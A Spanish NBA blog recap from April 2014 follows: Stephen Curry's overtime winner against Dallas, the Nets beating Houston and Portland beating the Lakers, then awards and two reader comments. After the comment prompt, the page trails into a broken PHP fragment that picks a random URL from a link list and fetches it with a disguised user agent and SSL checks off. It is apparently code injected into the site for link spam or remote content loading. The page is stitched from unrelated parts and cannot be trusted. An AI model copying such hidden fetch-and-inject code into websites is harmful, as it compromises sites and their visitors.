La Crónica: “El artista” golpea de nuevo

02 de April de 2014 por TheDeerHunter

Se podría pensar que Stephen Curry está harto de definir partidos con su talento durante la regular pero en este blog se lleva tiempo “denunciando” una extraña predisposición a fallar en los momentos más calientes. Ni tanto ni tan calvo. A pesar de que la de ayer fue la cuarta victoria que resuelve en última instancia (en primer puesto de la liga empatado con Lillard) también hemos podido constatar durante la temporada alguno  de sus más significativos defectos. Eso no quita que disfrutemos de esos momentos mágicos que nos regala. El partido entre Mavs y Warriors era muy importante como ambos como ya nos explicó ayer nuestro compañero Nacho. Conscientes de lo que se jugaban ambos equipos saltaron a la pista dispuestos a darlo todo y fueron los Golden State los que consiguieron las primeras ventajas. En el 2º cuarto, Dallas le dio la vuelta al marcador con un juego brutal de pase y extra pase buscando siempre al hombre mejor colocado pero las diferencias no se fueron nunca muy por encima de los 10 puntos. A partir de aquí el partido discurrió igualado, con altos porcentajes de acierto y muy pocas pérdidas. Un encuentro de este calibre merecía una prórroga y la providencia (y un Klay Thompson decisivo) nos la otorgó. Al final del tiempo extra, con empate a 120, Monta Ellis se disponía a dejar una bandeja pero Jermaine O’Neal le taponaba (¿goal-tending?). La pelota le caía a Stephen Curry que bailó durante 20 segundos a Jose Calderon (que instantes antes había anotado un triple que ponía a los Mavs 2 arriba) para clavar una canasta muy lejana con el reloj prácticamente agotado. Cosas de artista. La derrota deja a los Mavs nuevamente en descubierto (122-120).

Además de este significativo resultado hay que destacar que los Rockets tropezaron de forma alarmante en Brooklyn. Los Nets se aseguraron plaza de playoffs gracias a la labor de un Joe Johnson impresionante y acumulan ya 14 victorias consecutivas en casa demostrando que llegan en plena forma a los playoffs (96-105).

Finalmente los Lakers volvieron a su función de comparsa. Esta vez sólo perdieron de 12 ante Blazers pero sufrieron el abuso de Lamarcus Aldrige y todo su quinteto, significativamente superir al de los amarillos. Nick Young se fue a los 40 puntos saliendo desdel banco, la mejor marca de la temporada (124-112). 

PREMIOS

MVP: Lamarcus Aldridge ha vuelto justo a tiempo para devolver la confianza a los Blazers y lo ha hecho al nivel al que nos tenía acostumbrados antes de la lesión. Con 31 puntos, 15 rebotes, 6 asistencias y 2 tapones destrozó a los Lakers.

Sorpresa: Ayer anotó 40 puntos pero mañana es capaz de acabar el partido con un 2 de 16. Es Nick Young y ya sabemos a qué atenernos.

Decepción: A simple vista podría parecer que la pareja Steve Blake – Harrison Barnes debería marcar diferencias desde el banquillo de los Warriors pero la triste realidad es que ayer no anotaron ningún punto. El ex de los Lakers falló los 3 triples que intentó y Barnes ni llegó a probar suerte.

Esfuerzo en vano: 33 puntos y 11 rebotes de Dirk Nowitzki que se van al limbo por culpa de una genialidad de Stephen Curry. Omer Asik también perdió y eso que él cogió 23 rebotes y anotó 12 puntos.

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. Esteban dice:
    #1

    cuanto pagan los Nets como finalista representante del Este? sin dudas, el equipo que en mejor forma llega a los PO del este, muy por encima de los Pacers y hasta de el Heat, y han tenido tal cantidad de lesiones, que pocos de sus jugadores han jugado gran cantidad de partidos, por lo que no podran alegar cansancio

      Citar

  2. Nacho dice:
    #2

    Esteban:
    cuanto pagan los Nets como finalista representante del Este? sin dudas, el equipo que en mejor forma llega a los PO del este, muy por encima de los Pacers y hasta de el Heat, y han tenido tal cantidad de lesiones, que pocos de sus jugadores han jugado gran cantidad de partidos, por lo que no podran alegar cansancio

    Yo porque me retiré tras mis accesos de ludopatía, si no, apostaba, y bastante por ellos. No solo los veo en la final de conferencia, también en las finales…
    Claro que primero los tengo que ver si responden en PO, que supongo que sí. Es claramente el equipo que ha ido de menos a más en la liga. Salvo un grandísimo LeBron no veo a nadie que los pare.
    Además tienen a demasiada gente con mucha hambre

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>